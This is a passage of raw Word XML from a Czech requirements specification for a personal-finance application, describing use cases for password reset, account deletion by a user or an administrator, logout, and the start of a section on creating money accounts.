        <w:t>uživatelskému účtu při zapomenutí přístupového hesla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0183" w:rsidRDefault="006C0F66" w:rsidP="002E0183">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="002E0183">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0183" w:rsidRPr="002E0183" w:rsidRDefault="002E0183" w:rsidP="002E0183">
      <w:r>
        <w:t xml:space="preserve">Zaregistrovaný uživatel </w:t>
      </w:r>
      <w:r w:rsidR="00934703">
        <w:t>dříve systému poskytnul svoji emailovou adresu a nyní se nachází na úvodní stránce aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel vybere možnost obnovení zapomenutého hesla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel do formuláře zadá své uživatelské jméno.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém validuje zadaný údaj.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém odešle na emailovou adresu uživatele zprávu obsahující odkaz s</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>unikátním kódem. Tento odkaz je platný po dobu jedné hodiny od vygenerování.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel přejde na zaslanou adresu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém validuje předaný unikátní kód a vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel do formuláře zadá své uživatelské jméno a nové heslo a formulář odešle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém validuje zaslané údaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRPr="006C0F66" w:rsidRDefault="00934703" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém změní přístupové heslo uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934703" w:rsidRDefault="00934703" w:rsidP="00934703">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Jestliže uživatel zadal neexistující uživatelské jméno nebo u daného uživatele není dostupná informace o jeho emailové adrese, tak UC končí. Uživatel na tuto skutečnost není ale nijak upozorněn</w:t>
      </w:r>
      <w:r w:rsidR="00BE3F1F">
        <w:t>, aby nebylo možné tímto způsobem zjistit existující uživatelská jména uložená v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00BE3F1F">
        <w:t>systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3F1F" w:rsidRDefault="00BE3F1F" w:rsidP="00BE3F1F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r>
        <w:t>Alternativní tok 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3F1F" w:rsidRDefault="00BE3F1F" w:rsidP="00934703">
      <w:r>
        <w:t>7.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud vypršela časová platnost unikátního kódu, je na tuto skutečnost uživatel upozorněn a UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3F1F" w:rsidRDefault="00BE3F1F" w:rsidP="00BE3F1F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t xml:space="preserve">Alternativní tok </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3F1F" w:rsidRDefault="00BE3F1F" w:rsidP="00BE3F1F">
      <w:r>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00BF0A01">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud uživatel zadal heslo, které nesplňuje požadavky na minimální sílu hesla, je na tento fakt upozorněn a údaje nebudou změněny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3F1F" w:rsidRDefault="00BF0A01" w:rsidP="00BE3F1F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00BE3F1F">
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00BE3F1F">
        <w:tab/>
        <w:t>Uživatel opraví z</w:t>
      </w:r>
      <w:r>
        <w:t>adané údaje a pokračuje krokem 8</w:t>
      </w:r>
      <w:r w:rsidR="00BE3F1F">
        <w:t xml:space="preserve"> základního scénáře.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3F1F" w:rsidRDefault="00BE3F1F" w:rsidP="00BE3F1F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t xml:space="preserve">Alternativní tok </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3F1F" w:rsidRDefault="00BE3F1F" w:rsidP="00934703">
      <w:r>
        <w:t>9.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud uživatel vyplnil neplatné uživatelské jméno nebo předaný unikátní kód nebyl vygenerován pro daného uživatele, tak UC končí. Uživatel na tuto skutečnost není ale nijak upozorněn, aby nebylo možné tímto způsobem zjistit existující uživatelská jména uložená v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRPr="008F1CD3" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRPr="006C0F66" w:rsidRDefault="00CE2323" w:rsidP="006C0F66">
      <w:r>
        <w:t>Uživateli je umožněno přihlásit se do systému pomocí nového hesla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD49DD" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC05: </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t>Odstranění uživatelského účtu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291ADB" w:rsidRPr="00291ADB" w:rsidRDefault="00291ADB" w:rsidP="00291ADB">
      <w:r>
        <w:t>UC umožňuje uživateli odstranění jeho uživatelského účtu včetně všech uložených souvisejících dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291ADB" w:rsidRDefault="006C0F66" w:rsidP="00291ADB">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="00291ADB">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291ADB" w:rsidRPr="00291ADB" w:rsidRDefault="00291ADB" w:rsidP="00291ADB">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="002F7F42" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost odstranění uživatelského účtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7F42" w:rsidRDefault="002F7F42" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář a upozorní uživatele na nenávratnost tohoto kroku a doporučí mu provést zálohu jeho dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7F42" w:rsidRDefault="002F7F42" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zadá své přihlašovací heslo a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7F42" w:rsidRDefault="002F7F42" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém validuje zadaný údaj.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7F42" w:rsidRPr="006C0F66" w:rsidRDefault="002F7F42" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Všechna data uživatele včetně jeho uživatelského účtu jsou odstraněna ze systému. Uživatel je odhlášen a přesměrován na úvodní stránku aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7F42" w:rsidRDefault="002F7F42" w:rsidP="007E3942">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Jestliže uživatel zadal špatné přístupové heslo je na tento fakt upozorněn a účet nebude odstraněn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7F42" w:rsidRPr="0022701A" w:rsidRDefault="002F7F42" w:rsidP="002F7F42">
      <w:r>
        <w:t>4.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Uživatel opraví zadané údaje a pokračuje krokem 3 základního scénáře.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0095357D" w:rsidRPr="0095357D" w:rsidRDefault="0095357D" w:rsidP="0095357D">
      <w:r>
        <w:t>Uživatel je odhlášen ze systému a všechna jeho data jsou odstraněna.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC06: </w:t>
      </w:r>
      <w:r w:rsidR="006C0F66">
        <w:t>Odstranění uživatelského účtu jiného uživatele</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F5FD7" w:rsidRPr="002F5FD7" w:rsidRDefault="002F5FD7" w:rsidP="002F5FD7">
      <w:r>
        <w:t>UC umožňuje správci systému odstranit uživatelský účet jiného uživatele v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému.</w:t>
      </w:r>
      <w:r w:rsidR="003E6D75">
        <w:t xml:space="preserve"> Slouží především k</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003E6D75">
        <w:t>odstranění neaktivních uživatelů systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRPr="008F1CD3" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="002F5FD7" w:rsidP="002F5FD7">
      <w:r>
        <w:t>Správce systému</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F5FD7" w:rsidRPr="002F5FD7" w:rsidRDefault="002F5FD7" w:rsidP="002F5FD7">
      <w:r>
        <w:t>Správce systému je přihlášený.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="002F5FD7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje seznam všech uživatelů systému. U každého zobrazí jeho uživatelské jméno, emailovou adresu a datum posledního přihlášení.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F5FD7" w:rsidRDefault="002F5FD7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Správce vybere uživatele, kterého chce odstranit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F5FD7" w:rsidRDefault="002F5FD7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém si vyžádá potvrzení kroku, při kterém vypíše uživatelské jméno, emailovou adresu a datum posledního přihlášení vybraného uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F5FD7" w:rsidRDefault="002F5FD7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Správce potvrdí svůj záměr odstranit vybraného uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F5FD7" w:rsidRPr="006C0F66" w:rsidRDefault="002F5FD7" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Všechna data vybraného uživatele včetně jeho uživatelského účtu jsou odstraněna ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F5FD7" w:rsidRPr="002F5FD7" w:rsidRDefault="000778E0" w:rsidP="002F5FD7">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud správce nepotvrdí záměr odstranit vybraného uživatele,</w:t>
      </w:r>
      <w:r w:rsidR="00BF0A01">
        <w:t xml:space="preserve"> tak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="002F5FD7">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000778E0" w:rsidRDefault="000778E0" w:rsidP="000778E0">
      <w:r>
        <w:t>Vybraný uživatel je odstraněn ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000778E0" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC07: </w:t>
      </w:r>
      <w:r w:rsidR="000778E0">
        <w:t>Odhlášení ze systému</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="002F5FD7" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>UC umožňuje přihlášenému uživateli odhlášení ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="008F1CD3" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="00173253" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost odhlášení ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uživatele odhlásí</w:t>
      </w:r>
      <w:r w:rsidR="00D33943">
        <w:t xml:space="preserve"> ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D33943" w:rsidRPr="00EA15C6" w:rsidRDefault="00D33943" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel je přesměrován na úvodní stránku aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRPr="006C0F66" w:rsidRDefault="00D33943" w:rsidP="006C0F66">
      <w:r>
        <w:t>Uživatel je odhlášen ze systému a nachází se na úvodní stránce aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00381787" w:rsidRDefault="00381787">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD49DD" w:rsidRDefault="00CD49DD" w:rsidP="00CD49DD">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc387327853"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Správa účtů</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w:rsidR="00A41147" w:rsidRPr="00A41147" w:rsidRDefault="00A41147" w:rsidP="00A41147">
      <w:r>
        <w:t>V této podkapitole budou pops</w:t>
      </w:r>
      <w:r w:rsidR="001D593A">
        <w:t>ány</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scénáře týkající se správy účtů.</w:t>
      </w:r>
      <w:r w:rsidR="00A346B6">
        <w:t xml:space="preserve"> Účet je abstrakcí jakéhokoliv způsobu držení finančních prostředků, které chce uživatel sledovat zvlášť. Může tak jít o běžný účet, spořící účet, stavební spoření, hotovost obecně, </w:t>
      </w:r>
      <w:r w:rsidR="00576AD6">
        <w:t>hotovost v peněžence, v trezoru apod</w:t>
      </w:r>
      <w:r w:rsidR="00A346B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD49DD" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UC08: </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t>Vytvoření nového účtu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="002F5FD7" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t xml:space="preserve">UC </w:t>
      </w:r>
      <w:r w:rsidR="00C915F9">
        <w:t>umožňuje uživateli vytvořit nový účet, ke kterému bude moci přiřazovat transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRPr="008F1CD3" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA15C6" w:rsidRDefault="00EA15C6" w:rsidP="00EA15C6">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
